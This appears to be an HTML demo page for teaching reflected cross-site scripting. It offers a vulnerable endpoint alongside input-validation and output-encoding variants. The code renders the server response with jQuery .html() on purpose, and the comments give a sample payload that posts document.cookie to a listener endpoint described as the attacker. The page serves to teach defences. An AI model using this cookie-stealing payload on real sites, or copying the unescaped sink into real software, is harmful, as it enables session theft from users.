<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hello</title>
</head>
<body>
<div>hello, xss反射测试页面</div>

<div id="request_div" style="margin-top: 30px;">
    <form id="submitForm">
        <!-- 攻击脚本输入示例如下，其中示例1仅仅是页面效果，示例2会实际发送数据给攻击者 -->
        <!-- 示例1： <script>alert('it is a xss test!')</script> -->
        <!-- 示例2： <script>$.ajax({url:"http://localhost:8081/listener/log",type:"POST",dataType:"json",data:JSON.stringify({data:document.cookie}),processData:false,contentType:"application/json",success:function(arg){console.log(arg);console.log("监听到数据");}});</script>-->
        <input name="username" type="text" />
    </form>

    <button onclick="ajaxRequest()">xss存在-ajax提交</button>
    <button onclick="ajaxNoXssCheckRequest()">xss不存在，输入校验-ajax提交</button>
    <button onclick="ajaxNoXssRequest()">xss不存在，输出编码-ajax提交</button>
</div>

<div id="response_div" style="margin-top: 30px;">
    <span>返回结果</span>

    <!-- 实际开发过程中，通常作为隐藏域存储 -->
    <input hidden id="showMsg"></input>

    <span id="xssSpan"></span>
</div>
</body>

<script src="/js/jquery-3.6.0.min.js"></script>
<script>

    // form序列化为json
    $.fn.serializeObject = function()
    {
        var o = {};
        var a = this.serializeArray();
        $.each(a, function() {
            if (o[this.name] !== undefined) {
                if (!o[this.name].push) {
                    o[this.name] = [o[this.name]];
                }
                o[this.name].push(this.value || '');
            } else {
                o[this.name] = this.value || '';
            }
        });
        return o;
    };

    $(function (){

    });

    function ajaxRequest() {
        ajaxDo("/xss/ajaxReflectionXSSShow")
    }

    function ajaxNoXssCheckRequest() {
        ajaxDo("/xss/ajaxWithoutReflectionXSSCheck");
    }

    function ajaxNoXssRequest() {
        ajaxDo("/xss/ajaxWithoutReflectionXSSShow");
    }

    function ajaxDo(url) {
        var formdata = $("#submitForm").serializeObject();
        $.ajax({
            url: url,
            type: 'POST',
            dataType: "json",
            data: JSON.stringify(formdata),
            processData: false, // tell jQuery not to process the data
            // contentType: false, // tell jQuery not to set contentType
            contentType: 'application/json', // tell jQuery not to set contentType
            success:function (user) {

                console.log(user);

                console.log(user.username);

                // 塞值类方法不会有xss（不触发页面重新渲染）
                //$("#showMsg").val(user.username);

                // ajax渲染类方法会有xss（脚本更改页面dom的方法，如果返回值不处理，都能触发XSS，此处的html和append，都能触发）
                //
                $("#xssSpan").html("");
                $("#xssSpan").html(user.username)
                // $("#xssSpan").append(user.username)
            }
        });
    }
</script>
</html>